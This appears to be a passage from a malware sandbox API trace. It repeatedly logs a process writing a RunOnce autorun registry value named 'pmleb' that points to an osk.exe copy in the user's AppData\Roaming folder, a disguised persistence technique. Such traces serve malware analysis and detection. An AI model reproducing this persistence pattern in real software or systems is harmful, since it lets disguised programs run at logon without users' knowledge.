SetTimer (hWnd=0x20280, nIDEvent=0x2372, uElapse=0xa, lpTimerFunc=0x0) returned 0x2372 [0100.831] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.844] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.844] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.844] KillTimer (hWnd=0x20280, uIDEvent=0x2372) returned 1 [0100.844] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.845] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.845] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.845] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.845] RegCloseKey (hKey=0x280) returned 0x0 [0100.846] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.846] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.846] SetTimer (hWnd=0x20280, nIDEvent=0x2373, uElapse=0xa, lpTimerFunc=0x0) returned 0x2373 [0100.846] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.865] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.865] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.866] KillTimer (hWnd=0x20280, uIDEvent=0x2373) returned 1 [0100.866] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.866] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.866] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.867] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.867] RegCloseKey (hKey=0x280) returned 0x0 [0100.867] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.867] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.867] SetTimer (hWnd=0x20280, nIDEvent=0x2374, uElapse=0xa, lpTimerFunc=0x0) returned 0x2374 [0100.867] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.875] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.875] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.875] KillTimer (hWnd=0x20280, uIDEvent=0x2374) returned 1 [0100.875] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.876] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.876] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.876] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.876] RegCloseKey (hKey=0x280) returned 0x0 [0100.877] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.877] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.877] SetTimer (hWnd=0x20280, nIDEvent=0x2375, uElapse=0xa, lpTimerFunc=0x0) returned 0x2375 [0100.877] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.891] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.891] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.891] KillTimer (hWnd=0x20280, uIDEvent=0x2375) returned 1 [0100.891] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.891] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.891] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.892] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.892] RegCloseKey (hKey=0x280) returned 0x0 [0100.892] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.892] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.892] SetTimer (hWnd=0x20280, nIDEvent=0x2376, uElapse=0xa, lpTimerFunc=0x0) returned 0x2376 [0100.892] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.906] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.906] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.906] KillTimer (hWnd=0x20280, uIDEvent=0x2376) returned 1 [0100.907] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.907] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.912] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.912] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.913] RegCloseKey (hKey=0x280) returned 0x0 [0100.913] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.913] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.913] SetTimer (hWnd=0x20280, nIDEvent=0x2377, uElapse=0xa, lpTimerFunc=0x0) returned 0x2377 [0100.913] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.922] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.922] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.922] KillTimer (hWnd=0x20280, uIDEvent=0x2377) returned 1 [0100.923] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.923] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.923] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.923] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.923] RegCloseKey (hKey=0x280) returned 0x0 [0100.923] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.923] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.923] SetTimer (hWnd=0x20280, nIDEvent=0x2378, uElapse=0xa, lpTimerFunc=0x0) returned 0x2378 [0100.924] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.938] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.938] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.938] KillTimer (hWnd=0x20280, uIDEvent=0x2378) returned 1 [0100.938] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.938] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.939] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.939] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.939] RegCloseKey (hKey=0x280) returned 0x0 [0100.939] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.939] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.939] SetTimer (hWnd=0x20280, nIDEvent=0x2379, uElapse=0xa, lpTimerFunc=0x0) returned 0x2379 [0100.939] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.953] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.953] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.953] KillTimer (hWnd=0x20280, uIDEvent=0x2379) returned 1 [0100.954] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.954] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.954] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.954] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.954] RegCloseKey (hKey=0x280) returned 0x0 [0100.954] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.955] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.955] SetTimer (hWnd=0x20280, nIDEvent=0x237a, uElapse=0xa, lpTimerFunc=0x0) returned 0x237a [0100.955] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.969] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.969] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.969] KillTimer (hWnd=0x20280, uIDEvent=0x237a) returned 1 [0100.969] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.970] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.970] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.970] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.970] RegCloseKey (hKey=0x280) returned 0x0 [0100.970] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.970] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.970] SetTimer (hWnd=0x20280, nIDEvent=0x237b, uElapse=0xa, lpTimerFunc=0x0) returned 0x237b [0100.970] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.984] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.984] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.985] KillTimer (hWnd=0x20280, uIDEvent=0x237b) returned 1 [0100.985] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.985] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.985] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.985] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.986] RegCloseKey (hKey=0x280) returned 0x0 [0100.986] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.986] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.986] SetTimer (hWnd=0x20280, nIDEvent=0x237c, uElapse=0xa, lpTimerFunc=0x0) returned 0x237c [0100.986] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.000] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.000] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.000] KillTimer (hWnd=0x20280, uIDEvent=0x237c) returned 1 [0101.000] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.001] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.001] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.001] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.001] RegCloseKey (hKey=0x280) returned 0x0 [0101.001] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.001] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.001] SetTimer (hWnd=0x20280, nIDEvent=0x237d, uElapse=0xa, lpTimerFunc=0x0) returned 0x237d [0101.001] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.016] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.016] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.016] KillTimer (hWnd=0x20280, uIDEvent=0x237d) returned 1 [0101.016] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.017] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.017] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.017] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.017] RegCloseKey (hKey=0x280) returned 0x0 [0101.017] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.017] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.018] SetTimer (hWnd=0x20280, nIDEvent=0x237e, uElapse=0xa, lpTimerFunc=0x0) returned 0x237e [0101.018] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.042] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.042] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.042] KillTimer (hWnd=0x20280, uIDEvent=0x237e) returned 1 [0101.042] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.043] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.043] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.043] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.043] RegCloseKey (hKey=0x280) returned 0x0 [0101.043] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.043] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.043] SetTimer (hWnd=0x20280, nIDEvent=0x237f, uElapse=0xa, lpTimerFunc=0x0) returned 0x237f [0101.043] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.047] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.047] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.047] KillTimer (hWnd=0x20280, uIDEvent=0x237f) returned 1 [0101.047] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.047] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.047] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.048] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.048] RegCloseKey (hKey=0x280) returned 0x0 [0101.048] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.048] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.048] SetTimer (hWnd=0x20280, nIDEvent=0x2380, uElapse=0xa, lpTimerFunc=0x0) returned 0x2380 [0101.048] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.063] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.063] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.063] KillTimer (hWnd=0x20280, uIDEvent=0x2380) returned 1 [0101.063] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.063] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.063] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.064] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.064] RegCloseKey (hKey=0x280) returned 0x0 [0101.064] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.064] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.064] SetTimer (hWnd=0x20280, nIDEvent=0x2381, uElapse=0xa, lpTimerFunc=0x0) returned 0x2381 [0101.064] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.078] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.078] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.078] KillTimer (hWnd=0x20280, uIDEvent=0x2381) returned 1 [0101.078] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.079] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.080] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.080] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.081] RegCloseKey (hKey=0x280) returned 0x0 [0101.081] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.081] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.081] SetTimer (hWnd=0x20280, nIDEvent=0x2382, uElapse=0xa, lpTimerFunc=0x0) returned 0x2382 [0101.081] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.094] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.094] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.094] KillTimer (hWnd=0x20280, uIDEvent=0x2382) returned 1 [0101.094] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.094] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.095] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.095] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.095] RegCloseKey (hKey=0x280) returned 0x0 [0101.095] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.095] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.095] SetTimer (hWnd=0x20280, nIDEvent=0x2383, uElapse=0xa, lpTimerFunc=0x0) returned 0x2383 [0101.095] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.109] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.109] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.109] KillTimer (hWnd=0x20280, uIDEvent=0x2383) returned 1 [0101.110] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.110] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.110] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.110] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.110] RegCloseKey (hKey=0x280) returned 0x0 [0101.111] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.111] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.111] SetTimer (hWnd=0x20280, nIDEvent=0x2384, uElapse=0xa, lpTimerFunc=0x0) returned 0x2384 [0101.111] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.125] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.125] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.125] KillTimer (hWnd=0x20280, uIDEvent=0x2384) returned 1 [0101.125] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.126] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.126] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, 